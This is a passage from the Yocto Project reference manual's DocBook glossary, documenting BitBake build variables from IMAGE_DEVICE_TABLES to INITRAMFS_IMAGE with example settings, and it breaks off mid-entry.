- <glossentry id='var-IMAGE_DEVICE_TABLES'><glossterm>IMAGE_DEVICE_TABLES</glossterm>
- <info>
- IMAGE_DEVICE_TABLES[doc] = "Specifies one or more files that contain custom device tables that are passed to the makedevs command as part of creating an image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies one or more files that contain custom device
- tables that are passed to the
- <filename>makedevs</filename> command as part of creating
- an image.
- These files list basic device nodes that should be
- created under <filename>/dev</filename> within the image.
- If <filename>IMAGE_DEVICE_TABLES</filename> is not set,
- <filename>files/device_table-minimal.txt</filename> is
- used, which is located by
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link>.
- For details on how you should write device table files,
- see <filename>meta/files/device_table-minimal.txt</filename>
- as an example.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_FEATURES'><glossterm>IMAGE_FEATURES</glossterm>
- <info>
- IMAGE_FEATURES[doc] = "The primary list of features to include in an image. Configure this variable in an image recipe."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The primary list of features to include in an image.
- Typically, you configure this variable in an image recipe.
- Although you can use this variable from your
- <filename>local.conf</filename> file, which is found in the
- <link linkend='build-directory'>Build Directory</link>,
- best practices dictate that you do not.
- <note>
- To enable extra features from outside the image recipe,
- use the
- <filename><link linkend='var-EXTRA_IMAGE_FEATURES'>EXTRA_IMAGE_FEATURES</link></filename> variable.
- </note>
- </para>
-
- <para>
- For a list of image features that ships with the Yocto
- Project, see the
- "<link linkend="ref-features-image">Image Features</link>"
- section.
- </para>
-
- <para>
- For an example that shows how to customize your image by
- using this variable, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage-imagefeatures'>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and <filename>EXTRA_IMAGE_FEATURES</filename></ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_FSTYPES'><glossterm>IMAGE_FSTYPES</glossterm>
- <info>
- IMAGE_FSTYPES[doc] = "Formats of root filesystem images that you want to have created."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the formats the OpenEmbedded build system uses
- during the build when creating the root filesystem.
- For example, setting <filename>IMAGE_FSTYPES</filename>
- as follows causes the build system to create root
- filesystems using two formats: <filename>.ext3</filename>
- and <filename>.tar.bz2</filename>:
- <literallayout class='monospaced'>
- IMAGE_FSTYPES = "ext3 tar.bz2"
- </literallayout>
- </para>
-
- <para>
- For the complete list of supported image formats from which
- you can choose, see
- <link linkend='var-IMAGE_TYPES'><filename>IMAGE_TYPES</filename></link>.
- </para>
-
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- If an image recipe uses the "inherit image" line
- and you are setting
- <filename>IMAGE_FSTYPES</filename> inside the
- recipe, you must set
- <filename>IMAGE_FSTYPES</filename> prior to
- using the "inherit image" line.
- </para></listitem>
- <listitem><para>
- Due to the way the OpenEmbedded build system
- processes this variable, you cannot update its
- contents by using <filename>_append</filename> or
- <filename>_prepend</filename>.
- You must use the <filename>+=</filename>
- operator to add one or more options to the
- <filename>IMAGE_FSTYPES</filename> variable.
- </para></listitem>
- </itemizedlist>
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_INSTALL'><glossterm>IMAGE_INSTALL</glossterm>
- <info>
- IMAGE_INSTALL[doc] = "Used by recipes to specify the packages to install into an image through image.bbclass."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Used by recipes to specify the packages to install into an
- image through the
- <link linkend='ref-classes-image'><filename>image</filename></link>
- class.
- Use the <filename>IMAGE_INSTALL</filename> variable with
- care to avoid ordering issues.
- </para>
-
- <para>
- Image recipes set <filename>IMAGE_INSTALL</filename>
- to specify the packages to install into an image through
- <filename>image.bbclass</filename>.
- Additionally, "helper" classes such as the
- <link linkend='ref-classes-core-image'><filename>core-image</filename></link>
- class exist that can take lists used with
- <filename><link linkend='var-IMAGE_FEATURES'>IMAGE_FEATURES</link></filename>
- and turn them into auto-generated entries in
- <filename>IMAGE_INSTALL</filename> in addition to its
- default contents.
- </para>
-
- <para>
- When you use this variable, it is best to use it as follows:
- <literallayout class='monospaced'>
- IMAGE_INSTALL_append = " <replaceable>package-name</replaceable>"
- </literallayout>
- Be sure to include the space between the quotation character
- and the start of the package name or names.
- <note><title>Caution</title>
- <itemizedlist>
- <listitem><para>
- When working with a
- <link linkend='images-core-image-minimal-initramfs'><filename>core-image-minimal-initramfs</filename></link>
- image, do not use the
- <filename>IMAGE_INSTALL</filename> variable to
- specify packages for installation.
- Instead, use the
- <link linkend='var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></link>
- variable, which allows the initial RAM
- filesystem (initramfs) recipe to use a fixed
- set of packages and not be affected by
- <filename>IMAGE_INSTALL</filename>.
- For information on creating an initramfs, see
- the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- </para></listitem>
- <listitem><para>
- Using <filename>IMAGE_INSTALL</filename> with
- the
- <ulink url='&YOCTO_DOCS_BB_URL;#appending-and-prepending'><filename>+=</filename></ulink>
- BitBake operator within the
- <filename>/conf/local.conf</filename> file or
- from within an image recipe is not recommended.
- Use of this operator in these ways can cause
- ordering issues.
- Since <filename>core-image.bbclass</filename>
- sets <filename>IMAGE_INSTALL</filename> to a
- default value using the
- <ulink url='&YOCTO_DOCS_BB_URL;#setting-a-default-value'><filename>?=</filename></ulink>
- operator, using a <filename>+=</filename>
- operation against
- <filename>IMAGE_INSTALL</filename> results in
- unexpected behavior when used within
- <filename>conf/local.conf</filename>.
- Furthermore, the same operation from within
- an image recipe may or may not succeed
- depending on the specific situation.
- In both these cases, the behavior is contrary
- to how most users expect the
- <filename>+=</filename> operator to work.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_LINGUAS'><glossterm>IMAGE_LINGUAS</glossterm>
- <info>
- IMAGE_LINGUAS[doc] = "Specifies the list of locales to install into the image during the root filesystem construction process."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the list of locales to install into the image
- during the root filesystem construction process.
- The OpenEmbedded build system automatically splits locale
- files, which are used for localization, into separate
- packages.
- Setting the <filename>IMAGE_LINGUAS</filename> variable
- ensures that any locale packages that correspond to packages
- already selected for installation into the image are also
- installed.
- Here is an example:
- <literallayout class='monospaced'>
- IMAGE_LINGUAS = "pt-br de-de"
- </literallayout>
- </para>
-
- <para>
- In this example, the build system ensures any Brazilian
- Portuguese and German locale files that correspond to
- packages in the image are installed (i.e.
- <filename>*-locale-pt-br</filename>
- and <filename>*-locale-de-de</filename> as well as
- <filename>*-locale-pt</filename>
- and <filename>*-locale-de</filename>, since some software
- packages only provide locale files by language and not by
- country-specific language).
- </para>
-
- <para>
- See the
- <link linkend='var-GLIBC_GENERATE_LOCALES'><filename>GLIBC_GENERATE_LOCALES</filename></link>
- variable for information on generating GLIBC locales.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_MANIFEST'><glossterm>IMAGE_MANIFEST</glossterm>
- <info>
- IMAGE_MANIFEST[doc] = "The manifest file for the image. This file lists all the installed packages that make up the image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The manifest file for the image.
- This file lists all the installed packages that make up
- the image.
- The file contains package information on a line-per-package
- basis as follows:
- <literallayout class='monospaced'>
- <replaceable>packagename</replaceable> <replaceable>packagearch</replaceable> <replaceable>version</replaceable>
- </literallayout>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-image'><filename>image</filename></link>
- class defines the manifest file as follows:
- <literallayout class='monospaced'>
- IMAGE_MANIFEST = "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.manifest"
- </literallayout>
- The location is derived using the
- <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
- and
- <link linkend='var-IMAGE_NAME'><filename>IMAGE_NAME</filename></link>
- variables.
- You can find information on how the image
- is created in the
- "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_NAME'><glossterm>IMAGE_NAME</glossterm>
- <info>
- IMAGE_NAME[doc] = "The name of the output image files minus the extension."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The name of the output image files minus the extension.
- This variable is derived using the
- <link linkend='var-IMAGE_BASENAME'><filename>IMAGE_BASENAME</filename></link>,
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>,
- and
- <link linkend='var-DATETIME'><filename>DATETIME</filename></link>
- variables:
- <literallayout class='monospaced'>
- IMAGE_NAME = "${IMAGE_BASENAME}-${MACHINE}-${DATETIME}"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_OVERHEAD_FACTOR'><glossterm>IMAGE_OVERHEAD_FACTOR</glossterm>
- <info>
- IMAGE_OVERHEAD_FACTOR[doc] = "Defines a multiplier that the build system applies to the initial image size for cases when the multiplier times the returned disk usage value for the image is greater than the sum of IMAGE_ROOTFS_SIZE and IMAGE_ROOTFS_EXTRA_SPACE."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines a multiplier that the build system applies to the initial image
- size for cases when the multiplier times the returned disk usage value
- for the image is greater than the sum of
- <filename><link linkend='var-IMAGE_ROOTFS_SIZE'>IMAGE_ROOTFS_SIZE</link></filename>
- and
- <filename><link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'>IMAGE_ROOTFS_EXTRA_SPACE</link></filename>.
- The result of the multiplier applied to the initial image size creates
- free disk space in the image as overhead.
- By default, the build process uses a multiplier of 1.3 for this variable.
- This default value results in 30% free disk space added to the image when this
- method is used to determine the final generated image size.
- You should be aware that post install scripts and the package management
- system uses disk space inside this overhead area.
- Consequently, the multiplier does not produce an image with
- all the theoretical free disk space.
- See <filename><link linkend='var-IMAGE_ROOTFS_SIZE'>IMAGE_ROOTFS_SIZE</link></filename>
- for information on how the build system determines the overall image size.
- </para>
-
- <para>
- The default 30% free disk space typically gives the image enough room to boot
- and allows for basic post installs while still leaving a small amount of
- free disk space.
- If 30% free space is inadequate, you can increase the default value.
- For example, the following setting gives you 50% free space added to the image:
- <literallayout class='monospaced'>
- IMAGE_OVERHEAD_FACTOR = "1.5"
- </literallayout>
- </para>
-
- <para>
- Alternatively, you can ensure a specific amount of free disk space is added
- to the image by using the
- <filename><link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'>IMAGE_ROOTFS_EXTRA_SPACE</link></filename>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_PKGTYPE'><glossterm>IMAGE_PKGTYPE</glossterm>
- <info>
- IMAGE_PKGTYPE[doc] = "Defines the package type (i.e. DEB, RPM, IPK, or TAR) used by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the package type (i.e. DEB, RPM, IPK, or TAR) used
- by the OpenEmbedded build system.
- The variable is defined appropriately by the
- <link linkend='ref-classes-package_deb'><filename>package_deb</filename></link>,
- <link linkend='ref-classes-package_rpm'><filename>package_rpm</filename></link>,
- <link linkend='ref-classes-package_ipk'><filename>package_ipk</filename></link>,
- or
- <link linkend='ref-classes-package_tar'><filename>package_tar</filename></link>
- class.
- <note><title>Warning</title>
- The <filename>package_tar</filename> class is broken
- and is not supported.
- It is recommended that you do not use it.
- </note>
- </para>
-
- <para>
- The
- <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_*</filename></link>
- and
- <link linkend='ref-classes-image'><filename>image</filename></link>
- classes use the <filename>IMAGE_PKGTYPE</filename> for
- packaging up images and SDKs.
- </para>
-
- <para>
- You should not set the <filename>IMAGE_PKGTYPE</filename>
- manually.
- Rather, the variable is set indirectly through the
- appropriate
- <link linkend='ref-classes-package'><filename>package_*</filename></link>
- class using the
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- variable.
- The OpenEmbedded build system uses the first package type
- (e.g. DEB, RPM, or IPK) that appears with the variable
- <note>
- Files using the <filename>.tar</filename> format are
- never used as a substitute packaging format for DEB,
- RPM, and IPK formatted files for your image or SDK.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_POSTPROCESS_COMMAND'><glossterm>IMAGE_POSTPROCESS_COMMAND</glossterm>
- <info>
- IMAGE_POSTPROCESS_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system creates the final image output files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call once the
- OpenEmbedded build system creates the final image
- output files.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- IMAGE_POSTPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the root filesystem path to a command
- within the function, you can use
- <filename>${IMAGE_ROOTFS}</filename>, which points to
- the directory that becomes the root filesystem image.
- See the
- <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_PREPROCESS_COMMAND'><glossterm>IMAGE_PREPROCESS_COMMAND</glossterm>
- <info>
- IMAGE_PREPROCESS_COMMAND[doc] = "Specifies a list of functions to call before the OpenEmbedded build system creates the final image output files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a list of functions to call before the
- OpenEmbedded build system creates the final image
- output files.
- You can specify functions separated by semicolons:
- <literallayout class='monospaced'>
- IMAGE_PREPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
- </literallayout>
- </para>
-
- <para>
- If you need to pass the root filesystem path to a command
- within the function, you can use
- <filename>${IMAGE_ROOTFS}</filename>, which points to
- the directory that becomes the root filesystem image.
- See the
- <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
- variable for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_ROOTFS'><glossterm>IMAGE_ROOTFS</glossterm>
- <info>
- IMAGE_ROOTFS[doc] = "The location of the root filesystem while it is under construction (i.e. during do_rootfs)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The location of the root filesystem while it is under
- construction (i.e. during the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task).
- This variable is not configurable.
- Do not change it.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_ROOTFS_ALIGNMENT'><glossterm>IMAGE_ROOTFS_ALIGNMENT</glossterm>
- <info>
- IMAGE_ROOTFS_ALIGNMENT[doc] = "Specifies the alignment for the output image file in Kbytes."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the alignment for the output image file in
- Kbytes.
- If the size of the image is not a multiple of
- this value, then the size is rounded up to the nearest
- multiple of the value.
- The default value is "1".
- See
- <link linkend='var-IMAGE_ROOTFS_SIZE'><filename>IMAGE_ROOTFS_SIZE</filename></link>
- for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_ROOTFS_EXTRA_SPACE'><glossterm>IMAGE_ROOTFS_EXTRA_SPACE</glossterm>
- <info>
- IMAGE_ROOTFS_EXTRA_SPACE[doc] = "Defines additional free disk space created in the image in Kbytes. By default, this variable is set to '0'."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines additional free disk space created in the image in Kbytes.
- By default, this variable is set to "0".
- This free disk space is added to the image after the build system determines
- the image size as described in
- <filename><link linkend='var-IMAGE_ROOTFS_SIZE'>IMAGE_ROOTFS_SIZE</link></filename>.
- </para>
-
- <para>
- This variable is particularly useful when you want to ensure that a
- specific amount of free disk space is available on a device after an image
- is installed and running.
- For example, to be sure 5 Gbytes of free disk space is available, set the
- variable as follows:
- <literallayout class='monospaced'>
- IMAGE_ROOTFS_EXTRA_SPACE = "5242880"
- </literallayout>
- </para>
-
- <para>
- For example, the Yocto Project Build Appliance specifically requests 40 Gbytes
- of extra space with the line:
- <literallayout class='monospaced'>
- IMAGE_ROOTFS_EXTRA_SPACE = "41943040"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_ROOTFS_SIZE'><glossterm>IMAGE_ROOTFS_SIZE</glossterm>
- <info>
- IMAGE_ROOTFS_SIZE[doc] = "Defines the size in Kbytes for the generated image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the size in Kbytes for the generated image.
- The OpenEmbedded build system determines the final size for the generated
- image using an algorithm that takes into account the initial disk space used
- for the generated image, a requested size for the image, and requested
- additional free disk space to be added to the image.
- Programatically, the build system determines the final size of the
- generated image as follows:
- <literallayout class='monospaced'>
- if (image-du * overhead) &lt; rootfs-size:
- internal-rootfs-size = rootfs-size + xspace
- else:
- internal-rootfs-size = (image-du * overhead) + xspace
-
- where:
-
- image-du = Returned value of the du command on
- the image.
-
- overhead = IMAGE_OVERHEAD_FACTOR
-
- rootfs-size = IMAGE_ROOTFS_SIZE
-
- internal-rootfs-size = Initial root filesystem
- size before any modifications.
-
- xspace = IMAGE_ROOTFS_EXTRA_SPACE
- </literallayout>
- </para>
-
- <para>
- See the <link linkend='var-IMAGE_OVERHEAD_FACTOR'><filename>IMAGE_OVERHEAD_FACTOR</filename></link>
- and <link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'><filename>IMAGE_ROOTFS_EXTRA_SPACE</filename></link>
- variables for related information.
-<!-- In the above example, <filename>overhead</filename> is defined by the
- <filename><link linkend='var-IMAGE_OVERHEAD_FACTOR'>IMAGE_OVERHEAD_FACTOR</link></filename>
- variable, <filename>xspace</filename> is defined by the
- <filename><link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'>IMAGE_ROOTFS_EXTRA_SPACE</link></filename>
- variable, and <filename>du</filename> is the results of the disk usage command
- on the initially generated image. -->
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_TYPEDEP'><glossterm>IMAGE_TYPEDEP</glossterm>
- <info>
- IMAGE_TYPEDEP[doc] = "Specifies a dependency from one image type on another."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a dependency from one image type on another.
- Here is an example from the
- <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
- class:
- <literallayout class='monospaced'>
- IMAGE_TYPEDEP_live = "ext3"
- </literallayout>
- </para>
-
- <para>
- In the previous example, the variable ensures that when
- "live" is listed with the
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- variable, the OpenEmbedded build system produces an
- <filename>ext3</filename> image first since one of the
- components of the live
- image is an <filename>ext3</filename>
- formatted partition containing the root
- filesystem.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-IMAGE_TYPES'><glossterm>IMAGE_TYPES</glossterm>
- <info>
- IMAGE_TYPES[doc] = "Specifies the complete list of supported image types by default."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the complete list of supported image types
- by default:
- <literallayout class='monospaced'>
- btrfs
- container
- cpio
- cpio.gz
- cpio.lz4
- cpio.lzma
- cpio.xz
- cramfs
- ext2
- ext2.bz2
- ext2.gz
- ext2.lzma
- ext3
- ext3.gz
- ext4
- ext4.gz
- f2fs
- hddimg
- iso
- jffs2
- jffs2.sum
- multiubi
- squashfs
- squashfs-lz4
- squashfs-lzo
- squashfs-xz
- tar
- tar.bz2
- tar.gz
- tar.lz4
- tar.xz
- tar.zst
- ubi
- ubifs
- wic
- wic.bz2
- wic.gz
- wic.lzma
- </literallayout>
- </para>
-
- <para>
- For more information about these types of images, see
- <filename>meta/classes/image_types*.bbclass</filename>
- in the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INC_PR'><glossterm>INC_PR</glossterm>
- <info>
- INC_PR[doc] = "Helps define the recipe revision for recipes that share a common include file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Helps define the recipe revision for recipes that share
- a common <filename>include</filename> file.
- You can think of this variable as part of the recipe revision
- as set from within an include file.
- </para>
-
- <para>
- Suppose, for example, you have a set of recipes that
- are used across several projects.
- And, within each of those recipes the revision
- (its <link linkend='var-PR'><filename>PR</filename></link>
- value) is set accordingly.
- In this case, when the revision of those recipes changes,
- the burden is on you to find all those recipes and
- be sure that they get changed to reflect the updated
- version of the recipe.
- In this scenario, it can get complicated when recipes
- that are used in many places and provide common functionality
- are upgraded to a new revision.
- </para>
-
- <para>
- A more efficient way of dealing with this situation is
- to set the <filename>INC_PR</filename> variable inside
- the <filename>include</filename> files that the recipes
- share and then expand the <filename>INC_PR</filename>
- variable within the recipes to help
- define the recipe revision.
- </para>
-
- <para>
- The following provides an example that shows how to use
- the <filename>INC_PR</filename> variable
- given a common <filename>include</filename> file that
- defines the variable.
- Once the variable is defined in the
- <filename>include</filename> file, you can use the
- variable to set the <filename>PR</filename> values in
- each recipe.
- You will notice that when you set a recipe's
- <filename>PR</filename> you can provide more granular
- revisioning by appending values to the
- <filename>INC_PR</filename> variable:
- <literallayout class='monospaced'>
- recipes-graphics/xorg-font/xorg-font-common.inc:INC_PR = "r2"
- recipes-graphics/xorg-font/encodings_1.0.4.bb:PR = "${INC_PR}.1"
- recipes-graphics/xorg-font/font-util_1.3.0.bb:PR = "${INC_PR}.0"
- recipes-graphics/xorg-font/font-alias_1.0.3.bb:PR = "${INC_PR}.3"
- </literallayout>
- The first line of the example establishes the baseline
- revision to be used for all recipes that use the
- <filename>include</filename> file.
- The remaining lines in the example are from individual
- recipes and show how the <filename>PR</filename> value
- is set.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INCOMPATIBLE_LICENSE'><glossterm>INCOMPATIBLE_LICENSE</glossterm>
- <info>
- INCOMPATIBLE_LICENSE[doc] = "Specifies a space-separated list of license names (as they would appear in LICENSE) that should be excluded from the build."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a space-separated list of license names
- (as they would appear in
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>)
- that should be excluded from the build.
- Recipes that provide no alternatives to listed incompatible
- licenses are not built.
- Packages that are individually licensed with the specified
- incompatible licenses will be deleted.
- </para>
-
- <note>
- This functionality is only regularly tested using
- the following setting:
- <literallayout class='monospaced'>
- INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
- </literallayout>
- Although you can use other settings, you might be required
- to remove dependencies on or provide alternatives to
- components that are required to produce a functional system
- image.
- </note>
-
- <note><title>Tips</title>
- It is possible to define a list of licenses that are allowed
- to be used instead of the licenses that are excluded. To do
- this, define a
- variable <filename>COMPATIBLE_LICENSES</filename> with the
- names of the licences that are allowed. Then
- define <filename>INCOMPATIBLE_LICENSE</filename> as:
- <literallayout class='monospaced'>
- INCOMPATIBLE_LICENSE = "${@' '.join(sorted(set(d.getVar('AVAILABLE_LICENSES').split()) - set(d.getVar('COMPATIBLE_LICENSES').split())))}"
- </literallayout>
- This will result
- in <filename>INCOMPATIBLE_LICENSE</filename> containing the
- names of all licences
- from <link linkend='var-AVAILABLE_LICENSES'><filename>AVAILABLE_LICENSES</filename></link>
- except the ones specified
- in <filename>COMPATIBLE_LICENSES</filename>, thus only
- allowing the latter licences to be used.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INHERIT'><glossterm>INHERIT</glossterm>
- <info>
- INHERIT[doc] = "Causes the named class or classes to be inherited globally."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Causes the named class or classes to be inherited globally.
- Anonymous functions in the class or classes
- are not executed for the
- base configuration and in each individual recipe.
- The OpenEmbedded build system ignores changes to
- <filename>INHERIT</filename> in individual recipes.
- </para>
-
- <para>
- For more information on <filename>INHERIT</filename>, see
- the
- "<ulink url="&YOCTO_DOCS_BB_URL;#inherit-configuration-directive"><filename>INHERIT</filename> Configuration Directive</ulink>"
- section in the Bitbake User Manual.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INHERIT_DISTRO'><glossterm>INHERIT_DISTRO</glossterm>
- <info>
- INHERIT_DISTRO[doc] = "Lists classes that will be inherited at the distribution level. It is unlikely that you want to edit this variable."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Lists classes that will be inherited at the
- distribution level.
- It is unlikely that you want to edit this variable.
- </para>
-
- <para>
- The default value of the variable is set as follows in the
- <filename>meta/conf/distro/defaultsetup.conf</filename>
- file:
- <literallayout class='monospaced'>
- INHERIT_DISTRO ?= "debian devshell sstate license"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INHIBIT_DEFAULT_DEPS'><glossterm>INHIBIT_DEFAULT_DEPS</glossterm>
- <info>
- INHIBIT_DEFAULT_DEPS[doc] = "Prevents the default dependencies, namely the C compiler and standard C library (libc), from being added to DEPENDS."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Prevents the default dependencies, namely the C compiler
- and standard C library (libc), from being added to
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>.
- This variable is usually used within recipes that do not
- require any compilation using the C compiler.
- </para>
-
- <para>
- Set the variable to "1" to prevent the default dependencies
- from being added.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INHIBIT_PACKAGE_DEBUG_SPLIT'><glossterm>INHIBIT_PACKAGE_DEBUG_SPLIT</glossterm>
- <info>
- INHIBIT_PACKAGE_DEBUG_SPLIT[doc] = "If set to "1", prevents the OpenEmbedded build system from splitting out debug information during packaging"
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Prevents the OpenEmbedded build system from splitting
- out debug information during packaging.
- By default, the build system splits out debugging
- information during the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task.
- For more information on how debug information is split out,
- see the
- <link linkend='var-PACKAGE_DEBUG_SPLIT_STYLE'><filename>PACKAGE_DEBUG_SPLIT_STYLE</filename></link>
- variable.
- </para>
-
- <para>
- To prevent the build system from splitting out
- debug information during packaging, set the
- <filename>INHIBIT_PACKAGE_DEBUG_SPLIT</filename> variable
- as follows:
- <literallayout class='monospaced'>
- INHIBIT_PACKAGE_DEBUG_SPLIT = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INHIBIT_PACKAGE_STRIP'><glossterm>INHIBIT_PACKAGE_STRIP</glossterm>
- <info>
- INHIBIT_PACKAGE_STRIP[doc] = "If set to "1", causes the build to not strip binaries in resulting packages."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set to "1", causes the build to not strip binaries in
- resulting packages and prevents the
- <filename>-dbg</filename> package from containing the
- source files.
- </para>
-
- <para>
- By default, the OpenEmbedded build system strips
- binaries and puts the debugging symbols into
- <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-dbg</filename>.
- Consequently, you should not set
- <filename>INHIBIT_PACKAGE_STRIP</filename> when you plan
- to debug in general.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INHIBIT_SYSROOT_STRIP'><glossterm>INHIBIT_SYSROOT_STRIP</glossterm>
- <info>
- INHIBIT_SYSROOT_STRIP[doc] = "If set to "1", causes the build to not strip binaries in the resulting sysroot."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- If set to "1", causes the build to not strip binaries in
- the resulting sysroot.
- </para>
-
- <para>
- By default, the OpenEmbedded build system strips
- binaries in the resulting sysroot.
- When you specifically set the
- <filename>INHIBIT_SYSROOT_STRIP</filename> variable to
- "1" in your recipe, you inhibit this stripping.
- </para>
-
- <para>
- If you want to use this variable, include the
- <link linkend='ref-classes-staging'><filename>staging</filename></link>
- class.
- This class uses a <filename>sys_strip()</filename>
- function to test for the variable and acts accordingly.
- <note>
- Use of the <filename>INHIBIT_SYSROOT_STRIP</filename>
- variable occurs in rare and special circumstances.
- For example, suppose you are building bare-metal
- firmware by using an external GCC toolchain.
- Furthermore, even if the toolchain's binaries are
- strippable, other files exist that are needed for the
- build that are not strippable.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRAMFS_FSTYPES'><glossterm>INITRAMFS_FSTYPES</glossterm>
- <info>
- INITRAMFS_FSTYPES[doc] = "Defines the format for the output image of an initial RAM filesystem (initramfs), which is used during boot."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Defines the format for the output image of an initial
- RAM filesystem (initramfs), which is used during boot.
- Supported formats are the same as those supported by the
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- variable.
- </para>
-
- <para>
- The default value of this variable, which is set in the
- <filename>meta/conf/bitbake.conf</filename> configuration
- file in the
- <link linkend='source-directory'>Source Directory</link>,
- is "cpio.gz".
- The Linux kernel's initramfs mechanism, as opposed to the
- initial RAM filesystem
- <ulink url='https://en.wikipedia.org/wiki/Initrd'>initrd</ulink>
- mechanism, expects an optionally compressed cpio
- archive.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-INITRAMFS_IMAGE'><glossterm>INITRAMFS_IMAGE</glossterm>
- <info>
- INITRAMFS_IMAGE[doc] = "Specifies the PROVIDES name of an image recipe that is used to build an initial RAM filesystem (initramfs) image."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the
- <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
- name of an image recipe that is used to build an initial
- RAM filesystem (initramfs) image.
- In other words, the <filename>INITRAMFS_IMAGE</filename>
- variable causes an additional recipe to be built as
- a dependency to whatever root filesystem recipe you
- might be using (e.g. <filename>core-image-sato</filename>).
- The initramfs image recipe you provide should set
